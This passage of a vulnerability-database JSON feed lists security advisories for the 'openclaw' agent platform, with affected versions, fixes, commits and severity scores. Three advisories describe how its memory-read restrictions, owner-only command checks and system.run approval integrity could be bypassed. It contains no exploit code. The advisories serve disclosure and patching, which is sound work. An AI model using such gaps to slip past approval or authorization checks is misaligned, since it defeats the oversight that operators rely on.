s/VCID-a2wx-7b8h-c3h1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89810?format=json","vulnerability_id":"VCID-a46u-tnbh-fyhs","summary":"OpenClaw: QMD memory_get restricts reads to canonical or indexed memory paths\n## Summary\n\nThe QMD backend `memory_get` read path accepted arbitrary workspace Markdown paths that were inside the workspace but outside the canonical memory locations or indexed QMD result set.\n\n## Impact\n\nWhen the QMD backend was enabled, a caller with access to `memory_get` could read arbitrary `*.md` files under the configured workspace root, even when those files were not canonical memory files and had not been returned by QMD search. Severity remains low because exploitation requires access to the memory tool surface and is limited to workspace Markdown files, but it bypassed the intended memory-path policy.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` restricts QMD reads to canonical memory paths or previously indexed QMD workspace paths. 
Workspace containment alone is no longer sufficient.\n\nVerified in `v2026.4.15`:\n\n- `extensions/memory-core/src/memory/qmd-manager.ts` rejects non-default workspace Markdown paths unless they match an indexed QMD workspace read path.\n- `extensions/memory-core/src/memory/qmd-manager.test.ts` covers QMD session search-result reads and the read-path restriction behavior.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `37d5971db36491d5050efd42c333cbe0b98ed292` via PR #66026\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/37d5971db36491d5050efd42c333cbe0b98ed292","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/37d5971db36491d5050efd42c333cbe0b98ed292"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66026","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66026"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f934-5rqf-xx47","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements
":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f934-5rqf-xx47"},{"reference_url":"https://github.com/advisories/GHSA-f934-5rqf-xx47","reference_id":"GHSA-f934-5rqf-xx47","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f934-5rqf-xx47"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109881?format=json","purl":"pkg:npm/openclaw@2026.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"}],"aliases":["GHSA-f934-5rqf-xx47"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a46u-tnbh-fyhs"},{"url":"http://
public2.vulnerablecode.io/api/vulnerabilities/90199?format=json","vulnerability_id":"VCID-a4jz-y9s4-zkfg","summary":"OpenClaw: Owner-enforced commands could accept wildcard channel senders as command owners\n## Impact\n\nOpenClaw deployments before `2026.4.21` could treat a non-owner sender as authorized for owner-enforced slash commands when all of the following were true:\n\n- a channel plugin declared `commands.enforceOwnerForCommands: true`;\n- the channel accepted wildcard inbound senders with `allowFrom: [\"*\"]`;\n- no explicit `commands.ownerAllowFrom` was configured.\n\nIn that state, `src/auto-reply/command-auth.ts` reused the channel inbound wildcard as part of the command-owner decision. A sender who was not the owner could therefore pass the owner-command gate for commands such as `/send`, `/config`, or `/debug` on the affected channel.\n\nThe issue is limited to the command-owner authorization axis. It does not by itself grant owner-only tool access, host/sandbox access, or gateway administrator scope.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected versions: `<= 2026.4.20`\n- Patched version: `2026.4.21`\n\nThe latest public release, `2026.4.21`, contains the fix.\n\n## Patches\n\nThe fix requires a concrete owner identity or internal operator-admin scope when a plugin enforces owner-only commands. Wildcard channel `allowFrom` no longer implies wildcard command ownership.\n\nFix commits:\n\n- `2aa93d44a1b2c7058c371f261fda2b5d4de4a882` on `main`\n- `995febb7b1e811ff6a1df5b18c22de94103f4c9f` in the `2026.4.21` release line\n\n## Workarounds\n\nUpgrade to `openclaw@2026.4.21` or later. 
Before upgrading, avoid wildcard/open-DM sender policy on owner-enforced channels, or configure `commands.ownerAllowFrom` to the intended owner identities.\n\n## Credits\n\nOpenClaw thanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44991","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08975","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08973","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08993","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44991"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2aa93d44a1b2c7058c371f261fda2b5d4de4a882","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2aa93d44a1b2c7058c371f261fda2b5d4de4a882"},{"reference_url":"https://github.com/openclaw/openclaw/commit/995febb7b1e811ff6a1df5b18c22de
94103f4c9f","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/995febb7b1e811ff6a1df5b18c22de94103f4c9f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c28g-vh7m-fm7v","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c28g-vh7m-fm7v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44991","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44991"},{"reference_url":"https://www.vulnchec
k.com/advisories/openclaw-authorization-bypass-in-owner-enforced-commands-via-wildcard-channel-senders","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-owner-enforced-commands-via-wildcard-channel-senders"},{"reference_url":"https://github.com/advisories/GHSA-c28g-vh7m-fm7v","reference_id":"GHSA-c28g-vh7m-fm7v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c28g-vh7m-fm7v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/111520?format=json","purl":"pkg:npm/openclaw@2026.4.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.21"}],"aliases":["CVE-2026-44991","GHSA-c28g-vh7m-fm7v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnera
bilities/VCID-a4jz-y9s4-zkfg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91653?format=json","vulnerability_id":"VCID-aawy-8xg4-1uen","summary":"OpenClaw: Unbound interpreter and runtime commands could bypass node-host approval integrity\n## Summary\nIn affected versions of `openclaw`, node-host `system.run` approvals could still execute rewritten local code for interpreter and runtime commands when OpenClaw could not bind exactly one concrete local file operand during approval planning.\n\n## Impact\nDeployments using node-host `system.run` approval mode could approve a benign local script and then execute different local code if that script changed before execution. This can lead to unintended local code execution as the OpenClaw runtime user.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe approval flow treated some interpreter and runtime forms as approval-backed even when it could not honestly bind a single direct local script file. That left residual approval-integrity gaps for runtime forms outside the directly bound file set.\n\n## Fix\nOpenClaw now fails closed for approval-backed interpreter and runtime commands unless it can bind exactly one concrete local file operand, and it extends best-effort direct-file binding for additional runtime forms. 
The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32979","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15747","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15697","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15738","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32979"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xf99-j42q-5w5p","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T12:49:40Z/"}],"url":"https
://github.com/openclaw/openclaw/security/advisories/GHSA-xf99-j42q-5w5p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32979","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32979"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unbound-interpreter-and-runtime-commands-bypass-in-node-host-approval","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T12:49:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unbound-interpreter-and-runtime-commands-bypass-in-node-host-approval"},{"reference_url":"https://github.com/advisories/GHSA-xf99-j42q-5w5p","reference_id":"GHSA-xf99-j42q-5w5p","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xf99-j42q-5w5p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24
eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7g
ju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cw
d3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh
1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx